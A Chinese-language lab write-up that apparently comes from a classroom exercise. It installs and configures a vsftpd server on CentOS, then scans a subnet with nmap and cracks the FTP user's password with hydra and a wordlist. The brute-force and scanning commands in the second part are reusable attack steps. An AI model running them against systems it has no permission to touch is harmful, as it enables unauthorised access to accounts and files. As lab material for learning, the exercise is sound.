一：ftp服务的开启和相关设置

1.打开虚拟机linux系统，登陆默认用户root，密码为安装linux系统时自设。

2.因为是在机房环境，我修改了ip地址和物理地址。

3.安装ftp服务用工具，启动ftp服务。输入以下命令：

cd ..（退出到根目录，此命令为到上一级目录）

cd media（进入指定文件夹）

mkdir cdrom （创建cdrom文件夹）

ls （显示文件夹内容）

cd .. 

mount /dev/cdrom /media/cdrom/ （光盘镜像文件的挂接）

cd media

cd cdrom

ls

cd CentOS

ls

find /media/cdrom/CentOS/ -name *vsftpd*(查询)

rpm –ivh vsftpd……（输入vsftpd后tab可显示全称，安装）

service vsftpd start （启动ftp服务）

4.防火墙设置

此处，我设置为关闭防火墙

输入setup

5. 配置vstp服务器

vim /etc/vsftpd/vsftpd.conf

修改/etc/vsftpd/vsftpd.conf

将底下三行

#chroot_list_enable=YES

# (default follows)

#chroot_list_file=/etc/vsftpd.chroot_list

改为

chroot_list_enable=YES

# (default follows)

chroot_list_file=/etc/vsftpd/chroot_list

（在显示界面，输入“/”，后接内容可进行查找，按“i”进入编辑模式，“esc”退出编辑模式，“：q！”强制退出不保存，“：wq”退出并保存）

6.增加ftp用户及相关设置

增加用户ftpuser，指向目录/home/ ftpuser,禁止登录SSH权限。

useradd -d /home/ ftpuser -g ftp -s /sbin/nologin ftpuser

设置用户口令

passwd ftpuser

编辑文件chroot_list:

vi /etc/vsftpd/chroot_list

内容为ftp用户名,每个用户占一行,如：

ftpuser

peter

john

7.重启ftp服务

service vsftpd restart

二、ftp用户密码的破解及登录

8.cmdd界面下使用nmap命令（需要安装nmap）

如nmap –sP 10.0.100-120.*，意思为查找10.0.100.0——10.0.200.255网段的ip地址

9.破解ftp用户密码

使用hydra-7.6，需要下载密码字典生成字典

cmd下输入命令（进入hydra安装文件夹）

hydra.exe –l ftpuser –P d:/1.txt 10.0.100.74 ftp（ftpuser为要破解ftp用户名，1.txt为密码字典文件，ftp为服务名）

然后任意打开我的电脑或者ie浏览器，输入如ftp://ftpuser@10.0.30.74，之后在弹出的窗口输入密码，即可用该用户名进入ftp，能够上传下载文件。